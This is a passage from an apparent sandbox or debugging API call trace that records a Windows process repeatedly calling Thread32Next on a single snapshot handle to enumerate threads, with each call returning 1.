lpte=0x14fe78) returned 1 [0267.950] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.950] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.320] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.328] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.329] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.329] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.330] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.332] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.332] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.333] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.334] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.336] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.337] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.338] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.339] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.340] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.340] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.341] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.342] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.353] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.805] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.944] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.947] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.948] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.948] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.950] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.950] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.952] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.952] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0268.953] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.122] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.274] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.275] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.276] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.276] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.278] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.279] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.280] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.280] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.281] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.282] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.283] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.284] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.285] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.286] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.286] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.287] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.288] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.458] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.467] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.468] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.469] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.470] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.471] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.473] Thread32Next 